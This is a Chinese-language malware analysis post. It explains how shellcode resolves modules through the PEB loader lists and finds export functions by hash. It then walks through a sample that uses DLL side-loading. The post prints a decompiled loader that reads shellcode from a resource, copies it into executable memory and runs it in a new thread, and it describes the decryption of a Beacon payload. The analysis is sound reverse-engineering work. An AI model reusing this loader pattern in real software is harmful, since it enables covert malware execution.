概述
0x00
一般情况下shellcode会首先通过PEB定位到_PEB_LDR_DATA(+0xC)结构,然后从该结构中取出一条链表,可以是InLoadOrderModuleList(+0xC)可以是InMemoryOrderModuleList (+0x14)可以是InInitializationModuleList(+0x1c),之后通过遍历这条双向链表来解析LDRDATA_TABLE_ENTRY结构体,从该结构体中提取对应模块的长度(+0x2c)和名称(+0x30)。通过比较模块长度和字符串值来找到需要导入的模块的基址。
0x01
之后解析模块对应的PE文件,首先定位到DataDirectory结构体数组,然后确定导出表RVA,之后通过基址算出导出表地址,然后确定导出函数序号表的RVA(+0x24),导出函数名称表的RVA(+x20),导出函数地址表的RVA(+0x1c),导出函数个数(+0x18)。一般情况下shellcode这里通过比较函数的哈希来定位模块的导出函数。
0x02
最后,分析shellcode时一般只要对其中的call和跳转下断点就能迅速搞清楚其大致的功能了。
例子
这是某组织使用的样本。该样本通过白加黑调用恶意DLL,该DLL从资源段中读取shellcode来执行一个新线程。
-
char sub_10001BF0()
-
{
-
HMODULE v0; // edi
-
HRSRC v1; // esi
-
HGLOBAL v2; // ebx
-
DWORD v3; // edi
-
const void *v4; // ebx
-
DWORD (__stdcall *v5)(LPVOID); // eax
-
DWORD (__stdcall *v6)(LPVOID); // esi
-
HANDLE v7; // eax
-
DWORD ThreadId; // [esp+4h] [ebp-4h]
-
v0 = hModule;
-
InterlockedCompareExchange(&Destination, 1, 2);
-
if ( Destination == 1 )
-
{
-
Destination += 2;
-
v1 = FindResourceExW(v0, (LPCWSTR)274, (LPCWSTR)365, 1033u);
-
GetLastError();
-
if ( v1 )
-
{
-
v2 = LoadResource(v0, v1);
-
if ( v2 )
-
{
-
v3 = SizeofResource(v0, v1);
-
if ( v3 )
-
{
-
v4 = LockResource(v2);
-
if ( v4 )
-
{
-
v5 = (DWORD (__stdcall *)(LPVOID))VirtualAlloc(0, v3, 0x3000u, 0x40u);
-
v6 = v5;
-
if ( v5 )
-
{
-
memmove(v5, v4, v3);
-
ThreadId = 0;
-
v7 = CreateThread(0, 0x400000u, v6, 0, 0, &ThreadId);
-
WaitForSingleObject(v7, 0xFFFFFFFF);
-
VirtualFree(v6, v3, 0x8000u);
-
}
-
}
-
}
-
}
-
}
-
ExitProcess(0);
-
}
-
return 1;
-
}
shellcode执行流程和概述大同小异 首先定位到双向链表
然后解析PE文件
循环比较hash值
不同之处在于在循环比较的过程中有特别多的混淆
之后会一块一块的导入需要的函数,比如通过CreateThread执行一个线程开启一个服务,从ProgramData目录下读入一个Json文件到内存中通过CryptDecrypt来进行解密。解密出来的PE文件为该组织常用Beacon.dll
后续shellcode直接从”MZ”开始执行,并将导出函数_execute代码块复制到一块新的内存中跳转执行。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/77735.html